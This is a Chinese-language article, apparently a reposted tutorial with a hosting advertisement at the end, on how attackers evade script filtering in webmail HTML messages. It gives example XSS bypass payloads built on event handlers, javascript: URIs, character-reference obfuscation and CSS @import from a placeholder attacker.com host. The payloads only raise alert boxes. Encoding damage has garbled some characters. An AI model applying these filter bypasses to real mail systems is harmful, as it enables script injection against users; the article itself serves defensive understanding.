|
鑒于腳本程序可能帶來的危險�,WebMail系統(tǒng)完全有必要禁止html郵件中的腳本程序�。禁止腳本程序的基本做法就是過濾掉html源程序中能夠使腳本程序運行的代碼,如script元素等����,在這方面做的最好的莫過于hotmail了。下面是些常見的繞過腳本程序過濾的方法�,不少的WebMail系統(tǒng)仍然沒有完全改正:
(1)在html語言里,除了script元素內的或在script元素內引入的腳本程序能在html頁面裝載時被運行外����,使用事件屬性也能調用腳本程序運行���,事件屬性在JavaScript語言里被稱為事件句柄,用于對頁面上的某個特定事件(如鼠標點擊����、表單提交)做出響應,驅動javascript程序運行��。它的語法如下:
<tagattribute1attribute2onEventName="javascriptcode�����;">
例如:
以下為引用的內容:
<bodyonload="alert('JavaScript#1isexecuted')��;">
<ahref="#"onclick="alert('JavaScript#2isexecuted')��;">Clickhere</a>
<formmethod="post"action="#"onsubmit="alert('JavaScript#3isexecuted')�;">
<inputtype="submit"value="Submit">
</form>
</body>
(2)URI(UniversalResourceIdentifier:通用資源標識)用于定位Internet上每種可用的資源,如HTML文檔�����、圖像����、聲音等�����。瀏覽器根據URI的資源類型(URIscheme)調用相應的程序操作該資源����,如果把一些元素的URI屬性值的資源類型設為javascript�,則能夠調用javascript程序運行。語法如下���,注意要用“;”分隔不同的javascript語句:
<tagattribute="javascript:javascript-code�;">
例如:
以下為引用的內容:
<bodybackground="javascript:alert('JavaScript#1isexecuted');">
<ahref="javascript:alert('JavaScript#2isexecuted')���;">Clickhere</a>
<formmethod="post"action="javascript:alert('JavaScript#3isexecuted')��;">
<inputtype="submit"value="Submit">
</form>
<imgsrc="javascript:alert('JavaScript#4isexecuted')�;">
</body>
(3)由于軟硬件或其他原因���,一些冷僻或特殊的字符不能輸入或正確顯示在html頁面上��,為了解決這個問題�,html中可以使用SGML字符參考。字符參考是一種用來指定文檔字符集中任何字符的獨立編碼機制��,以“&”開始��,以“����;”結束。字符參考有兩種表達方式:數字字符參考和實體字符參考�。數字字符參考的語法為“&#D;”(D代表一個十進制數)�����,或“&#xH�����;”�����、“&#XH�����;”(H代表一個十六進制數),例如“A�����;”�����、“A����;”表示字母“A”,“水�����;”��、“水��;”表示漢字“水”��。
攻擊者把html語句里的一些字符以數字字符參考來代替�,這樣能避開WebMail系統(tǒng)對腳本程序的過濾。需要注意的是����,元素和屬性不可以用字符參考表示,例如:
以下為引用的內容:
<body>
<imglowsrc="ja��;vasC���;ript:alert('JavaScript#1isexecuted')">
<ahref="j�;avA�;sC;ript:���;aler�;t('JavaScript#2
i�����;ܾxecuted')">Clickhere���;</a>
<formmethod="post"action="javascript:alert('JavaScript#3is
executed')">
<inputtype="S���;ubmit"value="Submit">
</form>
</body>
(4)樣式表是層疊樣式表單(CSS:CascadingStyleSheet)的簡稱�����,用于控制��、增強或統(tǒng)一網頁上的樣式(如字體���、顏色等),它能夠將樣式信息與網頁內容相分離��,在html語言的style標簽內可以用@import聲明輸入一個樣式表���。但是�����,如果輸入的資源類型或內容是javascript���,InternetExplorer瀏覽器仍然會執(zhí)行���。
以下為引用的內容:
例如:<styletype="text/css">
<!--
@importurl(javascript:alert('JavaScript#1isexecuted'))����;
@importurl(http://www.attacker.com/js.css);
-->
</style>
其中http://www.attacker.com/js.css的內容如下所示:
以下為引用的內容:
@importurl(javascript:alert('JavaScript#2isexecuted'))���;
@importurl(javascript:eval(String.fromCharCode
(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,
108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)))�����;
能夠繞過WebMail系統(tǒng)對腳本程序過濾的方法遠不止上面所說的這些����,例如曾有人發(fā)現把“<script>”標簽改成“<_a<script>”和“<<script>”的樣子能繞過yahoo電郵的過濾�����,這個漏洞yahoo在最近才改正過來��。
本文出自:億恩科技【mszdt.com】
服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商�!15年品質保障!--億恩科技[ENKJ.COM]
|
香港服務器租用
美國服務器租用
電信骨干機房
聯通骨干機房
0371-60135900
